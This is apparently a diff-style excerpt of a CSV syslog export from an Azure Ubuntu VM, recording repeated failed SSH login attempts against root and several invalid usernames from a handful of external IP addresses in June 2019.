+13624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:58,UbuntuDevEnv,2019-06-26 04:43:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:01,UbuntuDevEnv,2019-06-26 04:44:00,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 62450 ssh2,130881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62450,,
+13626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:03,UbuntuDevEnv,2019-06-26 04:44:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 62450 ssh2,130881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62450,,
+13627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:13,UbuntuDevEnv,2019-06-26 04:44:11,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 62450 ssh2],130881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62450,,
+13628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:13,UbuntuDevEnv,2019-06-26 04:44:13,auth,UbuntuDevEnv,info,Invalid user murai2 from 5.135.161.72 port 46674,130944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai2,5.135.161.7,46674,,
+13629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:13,UbuntuDevEnv,2019-06-26 04:44:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:13,UbuntuDevEnv,2019-06-26 04:44:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,130944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:14,UbuntuDevEnv,2019-06-26 04:44:13,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 62450: Too many authentication failures [preauth],130881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,62450,,
+13632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:14,UbuntuDevEnv,2019-06-26 04:44:13,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 62450 ssh2 [preauth],130881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62450,,
+13633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:14,UbuntuDevEnv,2019-06-26 04:44:13,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 62450 ssh2,130881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,62450,,
+13634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:14,UbuntuDevEnv,2019-06-26 04:44:13,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:14,UbuntuDevEnv,2019-06-26 04:44:13,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:15,UbuntuDevEnv,2019-06-26 04:44:14,auth,UbuntuDevEnv,info,Failed password for invalid user murai2 from 5.135.161.72 port 46674 ssh2,130944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai2,5.135.161.7,46674,,
+13637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:15,UbuntuDevEnv,2019-06-26 04:44:14,auth,UbuntuDevEnv,info,Disconnected from invalid user murai2 5.135.161.72 port 46674 [preauth],130944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai2,5.135.161.7,46674,,
+13638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:15,UbuntuDevEnv,2019-06-26 04:44:14,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 46674:11: Bye Bye [preauth],130944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,46674,,
+13639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:17,UbuntuDevEnv,2019-06-26 04:44:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:19,UbuntuDevEnv,2019-06-26 04:44:18,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3771 ssh2,130955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3771,,
+13641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:20,UbuntuDevEnv,2019-06-26 04:44:19,auth,UbuntuDevEnv,info,Invalid user 1 from 95.216.195.95 port 43122,130970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1,95.216.195.9,43122,,
+13642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:20,UbuntuDevEnv,2019-06-26 04:44:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:20,UbuntuDevEnv,2019-06-26 04:44:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,130970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:22,UbuntuDevEnv,2019-06-26 04:44:21,auth,UbuntuDevEnv,info,Failed password for invalid user 1 from 95.216.195.95 port 43122 ssh2,130970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1,95.216.195.9,43122,,
+13645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:22,UbuntuDevEnv,2019-06-26 04:44:21,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 43122:11: Bye Bye [preauth],130970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,43122,,
+13646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:22,UbuntuDevEnv,2019-06-26 04:44:21,auth,UbuntuDevEnv,info,Disconnected from invalid user 1 95.216.195.95 port 43122 [preauth],130970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1,95.216.195.9,43122,,
+13647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:22,UbuntuDevEnv,2019-06-26 04:44:21,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3771 ssh2,130955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3771,,
+13648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:33,UbuntuDevEnv,2019-06-26 04:44:33,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:33,UbuntuDevEnv,2019-06-26 04:44:33,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 3771: Too many authentication failures [preauth],130955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,3771,,
+13650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:33,UbuntuDevEnv,2019-06-26 04:44:33,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 3771 ssh2],130955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3771,,
+13651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:33,UbuntuDevEnv,2019-06-26 04:44:33,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:33,UbuntuDevEnv,2019-06-26 04:44:33,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 3771 ssh2 [preauth],130955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3771,,
+13653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:36,UbuntuDevEnv,2019-06-26 04:44:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,131022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:38,UbuntuDevEnv,2019-06-26 04:44:37,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9699 ssh2,131022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9699,,
+13655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:39,UbuntuDevEnv,2019-06-26 04:44:39,auth,UbuntuDevEnv,info,Invalid user manager from 200.6.188.38 port 42464,131036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,200.6.188.3,42464,,
+13656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:39,UbuntuDevEnv,2019-06-26 04:44:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,131036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:39,UbuntuDevEnv,2019-06-26 04:44:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,131036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:40,UbuntuDevEnv,2019-06-26 04:44:40,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9699 ssh2,131022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9699,,
+13659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:42,UbuntuDevEnv,2019-06-26 04:44:41,auth,UbuntuDevEnv,info,Failed password for invalid user manager from 200.6.188.38 port 42464 ssh2,131036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,200.6.188.3,42464,,
+13660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:42,UbuntuDevEnv,2019-06-26 04:44:41,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 42464:11: Bye Bye [preauth],131036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,42464,,
+13661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:42,UbuntuDevEnv,2019-06-26 04:44:41,auth,UbuntuDevEnv,info,Disconnected from invalid user manager 200.6.188.38 port 42464 [preauth],131036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,200.6.188.3,42464,,
+13662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:42,UbuntuDevEnv,2019-06-26 04:44:42,auth,UbuntuDevEnv,info,Invalid user abah from 119.123.240.8 port 33611,131039,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abah,119.123.240.8,33611,,
+13663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:42,UbuntuDevEnv,2019-06-26 04:44:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,131039,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+13664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:42,UbuntuDevEnv,2019-06-26 04:44:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,131039,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:43,UbuntuDevEnv,2019-06-26 04:44:43,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9699 ssh2,131022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9699,,
+13666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:44,UbuntuDevEnv,2019-06-26 04:44:43,auth,UbuntuDevEnv,info,Failed password for invalid user abah from 119.123.240.8 port 33611 ssh2,131039,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abah,119.123.240.8,33611,,
+13667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:44,UbuntuDevEnv,2019-06-26 04:44:44,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 33611:11: Bye Bye [preauth],131039,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,33611,,
+13668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:44,UbuntuDevEnv,2019-06-26 04:44:44,auth,UbuntuDevEnv,info,Disconnected from invalid user abah 119.123.240.8 port 33611 [preauth],131039,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abah,119.123.240.8,33611,,
+13669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:46,UbuntuDevEnv,2019-06-26 04:44:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 9699 ssh2,131022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9699,,
+13670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:51,UbuntuDevEnv,2019-06-26 04:44:50,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 9699 ssh2 [preauth],131022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9699,,
+13671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:51,UbuntuDevEnv,2019-06-26 04:44:50,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 9699 ssh2],131022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9699,,
+13672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:51,UbuntuDevEnv,2019-06-26 04:44:50,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,131022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:51,UbuntuDevEnv,2019-06-26 04:44:50,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 9699: Too many authentication failures [preauth],131022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,9699,,
+13674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:51,UbuntuDevEnv,2019-06-26 04:44:50,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,131022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:54,UbuntuDevEnv,2019-06-26 04:44:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:44:56,UbuntuDevEnv,2019-06-26 04:44:56,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 15571 ssh2,321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15571,,
+13677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:01,UbuntuDevEnv,2019-06-26 04:45:01,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 15571 ssh2],321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15571,,
+13678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:04,UbuntuDevEnv,2019-06-26 04:45:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 15571 ssh2,321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15571,,
+13679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:09,UbuntuDevEnv,2019-06-26 04:45:08,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 15571: Too many authentication failures [preauth],321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,15571,,
+13680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:09,UbuntuDevEnv,2019-06-26 04:45:08,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 15571 ssh2],321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15571,,
+13681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:09,UbuntuDevEnv,2019-06-26 04:45:08,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:09,UbuntuDevEnv,2019-06-26 04:45:08,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:45:09,UbuntuDevEnv,2019-06-26 04:45:08,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 15571 ssh2 [preauth],321,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15571,,
